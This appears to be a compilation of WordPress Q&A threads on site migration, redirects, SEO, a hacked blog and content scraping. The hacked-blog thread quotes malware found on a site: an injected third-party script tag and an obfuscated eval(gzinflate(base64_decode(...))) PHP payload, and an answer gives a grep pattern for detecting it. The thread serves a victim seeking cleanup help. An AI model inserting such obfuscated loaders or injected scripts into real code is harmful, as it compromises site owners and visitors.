How To Safely Migrate From WordPress To Non-WordPress

I have a website that I made very quickly a while ago, using a WordPress theme. I completely forgot about it for a few months and checked the traffic for the first time today, and surprisingly it has been getting a lot of visitors and has generated some income.
Currently the design is pretty horrible, and I am 100% positive that if I redesign the website myself, I can get many more visitors and conversions.
So I'm thinking about getting rid of WordPress and publishing a new website using Bootstrap, keeping the same content and URLs that I had.
But I'm scared that doing so would mess up my SEO and cost me my organic rankings. I am on the first page for my main keyword, and I would hate to lose that spot.
When a site goes through a redesign like this, are there any specific steps I should take? Should I just keep the WordPress site to be safe? Or am I worrying about something that won't even happen? I would love to hear any tips or feedback about this.

I have had recent experience with exactly this problem.
The URLs of the WordPress site are an asset that search engines have invested in indexing. Your ranking (which has taken time to accumulate) is in part dependent on preserving the URLs of the pages of your site.
You will ideally need to set up redirects (via an .htaccess file if you are using Apache) from the old URLs to the new ones.
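As a rough sketch (every path and domain below is a placeholder), the Apache version can be a few lines of mod_alias or mod_rewrite in that .htaccess file:

# Permanently redirect an old WordPress permalink to its new location
Redirect 301 /2014/05/old-post-slug/ http://www.example.com/new-post.html

# Or, with mod_rewrite, redirect a whole pattern of old URLs at once
RewriteEngine On
RewriteRule ^category/(.*)$ http://www.example.com/$1 [R=301,L]

The 301 status matters: it tells search engines the move is permanent, so the old URL's accumulated ranking is passed along rather than discarded.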
Rushing into commissioning a new site without researching this will cause you a huge SEO loss that takes six months or more to recover from.

Please take your time on this. I have had too many companies call me about this after they screwed it up.
Build out the new site on a test site that is not indexed, make sure it works, make sure the URLs are the same, and test it.
Make sure you have a perfect .htaccess file, and I mean 100% perfect. Flip the new site on with the new and updated .htaccess file, and then make sure your sitemap and robots.txt file are stellar. Submit all of it to Google Webmaster Tools and to Bing Webmaster Tools. If you change your URLs, you are going back to the stone age. If you keep the URLs the same, you will not see an issue.
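For reference, a minimal robots.txt (example.com is a placeholder) that blocks nothing and advertises the sitemap you will submit looks like this:

User-agent: *
Disallow:

Sitemap: http://www.example.com/sitemap.xml

An empty Disallow line allows everything; the Sitemap line saves crawlers from having to guess where your sitemap lives.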
-Matt

Related

link in WP not going to the right page

I'm working with WP on different subdomains, and for some reason a link on the landing page isn't going to the subdomain; instead it's trying to go to a page that doesn't exist at the main domain level. I'm guessing this is some kind of auto-redirect issue, but the link is correct and I'm not sure what is causing this.
The main domain is in staging status: staging2.definingstudios.com. There are three links there: Lifestyle, Schools, and Commercial. The link to Schools had been doing this too, but then it stopped and is now working properly, while the Lifestyle one is still trying to go elsewhere.
Thoughts?
Thanks,
Christine
This isn't a WP issue but generally an issue with the theme. Themes tend to save this data in the DB; a lot of the time it's serialized and doesn't get updated.
You can do a few things. Search the DB and see if you can find it, use a plugin to do it, or (95% of the time) just go into that page and update/save, which generally fixes it.
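If you have WP-CLI on the server, its search-replace command is one way to fix stored URLs safely, since it unserializes values before replacing them (a raw SQL replace would corrupt serialized data). A sketch using the domains from your staging setup:

# Preview what would change, including inside serialized values
wp search-replace 'staging2.definingstudios.com' 'definingstudios.com' --dry-run

# Run it for real once the preview looks right
wp search-replace 'staging2.definingstudios.com' 'definingstudios.com'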

Lost all my sharing stats by purchasing a domain

I lost all the likes on my WordPress website when I bought a domain. It is still the same site, but it no longer uses the wordpress.com address, just the .com (http://sobreasdeliciasdavida.com/).
Despite being recent, my blog already had good statistics, and the loss of more than 500 Facebook shares takes it back to its beginning.
Can you offer an option for importing the likes to the new domain, since the posts are the same?
Is there any way to do this?
Oftentimes when you move a well-established site, you'll want to set up a 301 redirect from the previous site. It's a permanent redirect that ensures that people following links to your previous site end up at your new one. I should point out, though, that your blog is far from being taken back to its beginning. Remember, content is king, and you now have a site that's totally under your control and is already packed with great content: content that you know people respond to, like in social media venues, comment on, and so on. Don't worry about the 500 you might not get back, because you certainly have thousands more on the way if you just keep doing what you're doing.
If you are using the Facebook code directly in your website, then you can check this out: http://searchenginewatch.com/sew/how-to/2172926/maintain-social-shares-site-migration
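One known technique for holding on to share counts is to keep the og:url meta tag pointed at the URL Facebook already associates with them. A rough sketch for a self-hosted theme's header.php; the old wordpress.com hostname and the assumption that permalink paths match on both domains are hypothetical:

<?php
// Hypothetical sketch: tell Facebook to keep aggregating likes/shares
// under the old wordpress.com URL for each post. This only makes sense
// if the permalink paths on the new domain match the old ones.
$old_host = 'sobreasdeliciasdavida.wordpress.com'; // assumption
$path = parse_url( get_permalink(), PHP_URL_PATH );
echo '<meta property="og:url" content="http://' . esc_attr( $old_host . $path ) . '" />';
?>

The trade-off is that shares keep accruing to the old URL, so it is a bridge while the new domain builds its own counts, not a permanent fix.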

WordPress main website and mobile website duplicate content

Basically a client has asked for his WordPress website to be turned into a mobile website as well. I have never attempted this and know nothing about SEO.
However the issue has arisen that this may cause duplicate content issues with Google, and therefore both sites may be dropped in the rankings.
I was looking at turning the website into a mobile site via one of the available WordPress mobile website plugins.
My question is whether duplicate content will be an issue. Has anyone ever tried this?
After doing some reading I think it may be possible to tell Google not to index the mobile website, although as I understand it, it would be the same set of files. So I am unsure whether, if I tell it not to index one of them, it will drop the other one as well.
Can anyone with WordPress and SEO knowledge clear this up for me?
In my opinion, if you have two indexed URLs with the same text, there is duplicate content, and for Google, duplicate content is always an issue.
If you decide not to index the mobile version of the site, there will be no duplicate content, because only one version of the site will be indexed by Google.
Duplicate content is independent of your CMS (WordPress); it's simply a matter of two indexed pages with the same text.
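To illustrate, the no-index route is a single meta tag served only on the mobile URLs. Google also documents a gentler alternative for separate mobile URLs: annotating the pair so both versions are understood as one document. A sketch, with m.example.com as a placeholder:

<!-- Option 1: keep the mobile version out of the index entirely -->
<meta name="robots" content="noindex" />

<!-- Option 2: on the desktop page, declare the mobile alternate... -->
<link rel="alternate" media="only screen and (max-width: 640px)" href="http://m.example.com/page" />
<!-- ...and on the mobile page, point the canonical at the desktop URL -->
<link rel="canonical" href="http://www.example.com/page" />

Option 2 has the advantage that the mobile pages can still surface in mobile search results instead of disappearing from the index.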

A link to linkstoads.net in my WordPress blog, probably a virus. How do I get rid of it?

Recently (in the last two weeks) this line of code appeared in the footer of a WordPress blog:
<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>
I did not put it there. I have no idea what it does, but I want it out.
For my first try, I just replaced the template, and it was gone for a few minutes. But it came back.
So I went to my index.php file (not the template's, the top-level index.php) and found this code:
#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#
So I removed it, but it came back again the next day.
How is that possible? I'm a newbie when it comes to viruses and security, so the answer may be really basic.
Congratulations! You have been hacked! Most likely you haven't updated your software in quite some time, and multiple hackers have exploited some well-known vulnerability in it.
How do you fix it? Scorched earth. You have been hacked by many bots, and access to your site has probably been sold off online. Delete your entire web root and start from scratch. Make sure you have the latest versions of WordPress and of every plugin.
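Before (or instead of) wiping, you can at least gauge how far the infection spread. A sketch, assuming GNU grep, run from the web root, that lists every PHP file carrying the telltale obfuscation pattern from your index.php:

# List every PHP file containing the classic obfuscated-payload pattern
grep -rl "eval(gzinflate(base64_decode" --include="*.php" .

If that turns up files all over the tree, it confirms the scorched-earth advice: cleaning them one by one will not keep up with the reinfection.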
For the record, WordPress was written by monkeys, or children, or child monkeys... Regardless, it is by far one of the worst applications I have ever hacked. They are probably still using your password hash as the session ID, which means they don't even understand the basics of why you should hash passwords.
Oh, and if you keep getting hacked, hire a professional.
Problem solved; WordPress is not responsible for it.
There's a trojan that infects FileZilla, and when you open it, it injects code into every page it can reach via FileZilla.
This is really a big deal, and three antivirus programs could not even find it.
If you see that, format your computer.

How to prevent my blog's updates from being scraped?

I have a self-hosted WordPress blog, and, almost as expected, I found there's another blog scraping my content, posting a perfect copy of my own posts (text, plus images not hotlinked but fetched and re-uploaded to the clone's server, plus the HTML layout within the posts) with a few hours of delay.
I must confess I'm infuriated to see that when I search Google for keywords relevant to my posts, the scraping clone always comes first.
So, here I am, open to suggestions: would you know how to prevent my site from being successfully scraped?
Technical details:
The clone blog appears to be self-hosted, and so am I; I'm on a Debian + Webmin + Virtualmin dedicated server.
My RSS feed is already cut halfway with a "read more on" link. I just thought of something: I could publish a post with an assigned date like 2001-01-01 and see if it appears on the clone blog; that would tell me whether my RSS feed is still being used as the signal that it's scraping time.
My logs can't pick the scraper out of legitimate traffic; either it isn't identifiable or it's lost in the flood.
I have already htaccess-banned and iptables-banned the .com domain of the clone; my content is still cloned nonetheless.
The clone website makes use of reverse proxies, so I can't trace where it is hosted or which actual IPs should be blocked (well, unless I iptables-ban half of Europe to cover the whole IP ranges of its data storage facility, but I'm slightly reluctant to do that!).
I'm confident this isn't hand-made; the cloning has been running for two years now, every day without fail.
Only my new posts are cloned, not the rest of my website (not the sidebars, not the WordPress pages as opposed to WordPress posts, not the single pages), so setting up a jail.html page and logging who opens it won't work; no honey-potting.
When my posts contain internal links pointing to another page of my website, the posts on the clone won't be rewritten and will still point to my own website.
I'd love help and suggestions with this issue; not the cloning itself so much as losing traffic to that bot while I'm the original publisher.
You can't really stop them in the end, but you might be able to find them and mess with them. Try hiding the request IP in an HTML comment, in white-on-white text, or just somewhere out of the way, then see what IPs show up in the copies. You can also obfuscate that text by turning it into a hex string or something, so it's less obvious to someone who doesn't know what it is, or make it look like an error code, just so they don't catch on to what you're doing.
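A minimal sketch of that IP-marker idea as a WordPress content filter; the function name is made up, and bin2hex() is just one way of making the marker unobvious:

// Append the requester's IP, hex-encoded, as an HTML comment at the
// end of every post. Copies on the clone will carry the scraper's IP.
function watermark_request_ip( $content ) {
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '';
    return $content . "\n<!-- ref:" . bin2hex( $ip ) . " -->";
}
add_filter( 'the_content', 'watermark_request_ip' );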
In the end, though, I'm not sure how much it will buy you. If they're really inattentive, rather than shutting them down and calling attention to the fact that you're onto them, you can feed them gibberish whenever one of their IPs crops up. That might be fun, and it's not too hard to build a gibberish generator by feeding sample text into a Markov chain.
EDIT: Oh, and if the pages aren't rewritten too much, you might be able to add some inline JS to make them link to you, if they don't strip that. Say, a banner that only shows up when the page isn't on your site, giving the original link to your articles and suggesting that people read those.
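For the gibberish idea mentioned above, a minimal word-level Markov chain sketch (the function name is made up); feed it your own posts as sample text and serve the output when one of the scraper's IPs shows up:

// Hypothetical sketch: build a word-level Markov chain from sample
// text, then walk it to produce plausible-looking gibberish.
function markov_generate( $sample, $length = 50 ) {
    $tokens = preg_split( '/\s+/', trim( $sample ) );
    $chain = array();
    for ( $i = 0; $i < count( $tokens ) - 1; $i++ ) {
        $chain[ $tokens[ $i ] ][] = $tokens[ $i + 1 ];
    }
    $word = $tokens[ array_rand( $tokens ) ];
    $out = array( $word );
    for ( $i = 0; $i < $length; $i++ ) {
        if ( empty( $chain[ $word ] ) ) {
            $word = $tokens[ array_rand( $tokens ) ]; // dead end: restart
        } else {
            $word = $chain[ $word ][ array_rand( $chain[ $word ] ) ];
        }
        $out[] = $word;
    }
    return implode( ' ', $out );
}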
Are you willing to shut down your RSS feed? If so, you could do something like this:
// Replace every feed endpoint with a plain message instead of feed content.
function fb_disable_feed() {
    wp_die( __( 'No feed available, please visit our homepage!' ) );
}
// Hook the same handler into each feed type WordPress serves.
add_action( 'do_feed', 'fb_disable_feed', 1 );
add_action( 'do_feed_rdf', 'fb_disable_feed', 1 );
add_action( 'do_feed_rss', 'fb_disable_feed', 1 );
add_action( 'do_feed_rss2', 'fb_disable_feed', 1 );
add_action( 'do_feed_atom', 'fb_disable_feed', 1 );
This means that if someone goes to a feed page, they just get back the message passed to wp_die(). We use it for 'free' versions of our WP software, wrapped in an if-statement, so users can't hook into their RSS feeds to link back to their main website; it's an upsell opportunity for us. It works well, is my point, haha.
Even though this post is a little old, I thought it would still be helpful to weigh in in case other people find it with the same question. Since you've eliminated the RSS feed from the mix and you're pretty confident it isn't a manual effort, what you need to do is get better at stopping the bots they are using.
First, I would recommend banning proxy servers in your iptables rules. You can get a list of known proxy server addresses from MaxMind. This should limit their ability to anonymize themselves.
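As a sketch of what those bans could look like (the addresses are documentation placeholders; in practice you would generate one rule per entry in the MaxMind list):

# Drop a single known proxy address
iptables -A INPUT -s 203.0.113.7 -j DROP

# Or drop an entire range in one rule
iptables -A INPUT -s 203.0.113.0/24 -j DROP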
Second, it would help to make it harder for them to scrape. You could accomplish this in a couple of ways. You could render part or all of your site in JavaScript; if nothing else, you could at least render the links in JavaScript, as sketched below. This will make it significantly harder for them to scrape you. Alternatively, you can put your content within an iframe inside the pages. This will also make it somewhat harder to crawl and scrape.
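A sketch of the JavaScript-rendered-links idea (the class name is made up): keep the real destination in a data attribute and only attach it in the browser, so a scraper that doesn't execute JavaScript ends up with dead links.

<a class="js-link" data-href="/my-original-post/">Read the post</a>
<script>
// Attach real hrefs at runtime; non-JS scrapers only ever see data-href.
document.querySelectorAll('a.js-link').forEach(function (a) {
    a.href = a.getAttribute('data-href');
});
</script>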
All this said, if they really want your content, they will pretty easily get past these traps. Honestly, fighting off web scrapers is an arms race. You cannot put any static trap in place to stop them; instead you have to continuously evolve your tactics.
For full disclosure, I am a co-founder of Distil Networks, and we offer an anti-scraping solution as a service.
